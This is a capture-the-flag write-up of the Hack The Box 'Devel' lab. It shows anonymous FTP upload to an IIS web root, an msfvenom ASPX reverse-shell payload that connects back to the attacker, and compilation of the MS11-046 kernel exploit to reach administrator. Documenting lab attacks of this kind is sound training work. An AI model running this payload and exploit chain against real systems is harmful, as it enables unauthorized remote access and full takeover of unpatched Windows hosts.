HTB Walkthrough : Devel

Today we are going to solve a another bootoroot window machine created by ch4p . Its a retired lab which is available in hackthebox retired section . Let jumb into it .

Level : Easy

Attacking Strategy

  • Networking Scanning
    • Nmap
  • Enumeration
    • FTP Enumeration
  • Exploitation
    • ASPX reverse shell
  • Privilege Escalation
    • MS11-046 Exploit

Walkthrough

IP address : 10.129.68.202

we start our machine by firing Nmap with aggressive scan in which OS detection , Default Script Scan , Trace route , Version scanning is done .

Enumeration

 nmap -A 10.129.68.202 

The output of Nmap show that there is port 21 for FTP with anonymous login is allowed which gives a window to get our initial foothold . It also show that this machine is window based and On port 80 IIS server is hosted .

Nmap scan report for 10.129.68.202
Host is up (0.16s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Now here we start enumerating the port 21 i.e FTP service and here one thing catch our eye that IIS root directory is accessible as the ftp shared folder is same as the IIS shared directory .

echo "10.129.68.202 devel.htb" | sudo tee -a /etc/hosts
Username : Anonymous
Password : Anonymous
ftp devil.htb

we can confirm by adding the temporary file on Target machine then we can check weather we can access over HTTP protocol . So we add the small HTML file with some text and then we check it out by accessing the path of the file .

Exploitation

After successfully access our temporary page we can now go exploitation . Here we are going to create the payload in aspx format . For more to learn why we use ASPX payload you can check out here .

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4445 -f aspx > shell.aspx

Once the payload is ready , its time to test it by uploading using FTP Service and once its uploaded we can call the file with help of curl or your browser and we get our initial foothold on the lab .

curl "http://10.129.68.202/shell.aspx"

If everything done correctly we get our shell .

Privilege Escalation

Now its time to get the higher power for that we need to get administrator right for that we have to enumerate more about the machine and we start with getting some information about the machine what is the OS version , and patches or any other information which we can use in later part , for that window have the systeminfo command which we can use to enumerate the machines .

systeminfo.exe > systeminfo.txt 
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          21/4/2021, 4:49:31 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.470 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.551 MB
Virtual Memory: In Use:    590 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 4
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.68.202
                                 [02]: fe80::4a6:d5ca:df49:2a13
                                 [03]: dead:beef::f442:8dbc:7624:dbab

Now as we can see that there is no patches are installed in this machine so may we can go for kernel exploit . There are various ways to exploit it weather we can use metasploit framework module exploit suggester and then use any listed exploit or we can do it manually . For this articles we done it manually because we want to learn more .

For that we use the tool called wesng which you can get it from Github . To work with this tools all we need to pass the systeminfo so that this tool can list out all the possible ways to exploit the machines .

WES-NG is a tool based on the output of Windows’ systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.

python wes.py systeminfo.txt --exploits-only -i "Elevation of Privilege"
Windows Exploit Suggester 0.98 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - Name: Windows 7 for 32-bit Systems
    - Generation: 7
    - Build: 7600
    - Version: None
    - Architecture: 32-bit
    - Installed hotfixes: None
[+] Loading definitions
    - Creation date of definitions: 20210416
[+] Determining missing patches
[+] Applying display filters
[+] Found vulnerabilities

Date: 20130108
CVE: CVE-2013-0008
KB: KB2778930
Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Windows 7 for 32-bit Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: http://www.exploit-db.com/exploits/24485

Date: 20110614
CVE: CVE-2011-1249
KB: KB2503665
Title: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege
Affected product: Windows 7 for 32-bit Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/40564/

Date: 20110208
CVE: CVE-2010-4398
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows 7 for 32-bit Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/

Date: 20100209
CVE: CVE-2010-0232
KB: KB977165
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows 7 for 32-bit Systems
Affected component: 
Severity: Important
Impact: Elevation of Privilege
Exploits: http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip, http://www.securityfocus.com/bid/37864

[+] Missing patches: 4
    - KB977165: patches 1 vulnerability
    - KB2778930: patches 1 vulnerability
    - KB2393802: patches 1 vulnerability
    - KB2503665: patches 1 vulnerability
[+] KB with the most recent release date
    - ID: KB2778930
    - Release date: 20130108

[+] Done. Displaying 4 of the 236 vulnerabilities found.
                                                         

Result show that there possible four exploit which we can use in my case https://www.exploit-db.com/exploits/40564/ work fine all we have to compile it . We can get the exploit from exploitdb or searchsploit can also play the role in this arena .

searchsploit -m 40564 

Is time to compile the exploit for that we need GCC compiler for that we can install it as it is available on Kali repository . once the exploit is created and we can transfer to machine and run it .

sudo apt-get update && sudo  apt-get install mingw-w64
i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32

Here we get the administrator privilege and now we can read the flag and submit it the portal .

type "C:\Users\Administrator\Desktop\root.txt"
type "C:\Users\babis\Desktop\user.txt.txt"

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.